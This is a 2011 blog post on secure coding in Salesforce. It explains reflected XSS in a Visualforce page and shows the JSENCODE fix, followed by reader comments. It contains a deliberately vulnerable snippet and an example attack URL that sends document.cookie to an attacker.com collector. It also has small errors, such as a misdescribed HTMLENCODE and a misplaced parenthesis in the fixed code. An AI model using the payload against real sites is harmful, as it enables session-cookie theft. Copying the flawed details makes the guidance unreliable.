Saturday, 19 February 2011

Salesforce applications with security : Reflected XSS

XSS is also known as cross site scripting.  XSS allows a attackers to inject his code in client script.This is a web application vulnerabilities which allows a attackers to bypass the sharing rules . By doing this he can expose the sensitive data, session cookies etc. also.

Now coming back to the reflected XSS, it impacts the page while page is getting load. Suppose I have a block of script and I want to execute a script on page load. This is known as Reflected XSS.

Let's have a close look:
Here is a page , in the script block we are fetching an Id Parameter
<apex:page>
<script>
var xssExample = '{!$CurrentPage.Parameters.id}' ;
</script>
</apex:page>

Now have a deep look:
Page is called as :
/apex/TestPage?id=idvalue';1';document.location='http://www.attacker.com/cgi-bin/cookie.cgi?'%2Bdocument.cookie;var%20foo=';

So when the page will be loaded it will be executed in following manner:
 var xssExample = '{!$CurrentPage.Parameters.id}' ;
putting the id value from the request parameter :
var xssExample = 'idvalue';1';document.location='http://www.attacker.com/cgi-bin/cookie.cgi?'%2Bdocument.cookie;var%20foo=';

So here you can see that all the cookies will be sent to the attackers.com site.

To prevent from this , salesforce provides some encoding function for the those are available on Visualforce page like :etc.
JSENCODE, HTMLENCODE, JSINHTNLENCODE, URLENCODE etc.

So the code explained above can be  updated as :
var xssExample = '{!JSENCODE($CurrentPage.Parameters.id})' ;

So the value fetching from the request parameter will be encoded now.
JSENCODE : To encode the properties in javascript.
HTMLENCODE: To encode the properties in javascript.
JSINHTNLENCODE: If calling a javascript method from HTML component and passing the properties.
URLENCODE:  If building a URL on page.

Please feel free to ask the questions/doubts. Suggestions are appreciated.

3 comments:

  1. Here is the source of information :
    http://en.wikipedia.org/wiki/Cross-site_scripting
    http://wiki.developerforce.com/index.php/Secure_Coding_Cross_Site_Scripting

    ReplyDelete
  2. Indeed a helpful post for those who publish there app on app exchange.

    http://forceguru.blogspot.com/
    http://tinyurl.com/forceguru

    ReplyDelete
  3. Hi Bhawani,
    If we do encoding at javascript, say({!JSENCODE($CurrentPage.Parameters.id})), & again we need to send it by URL parameter, In that case, we have to get it by DECODDing it?

    ReplyDelete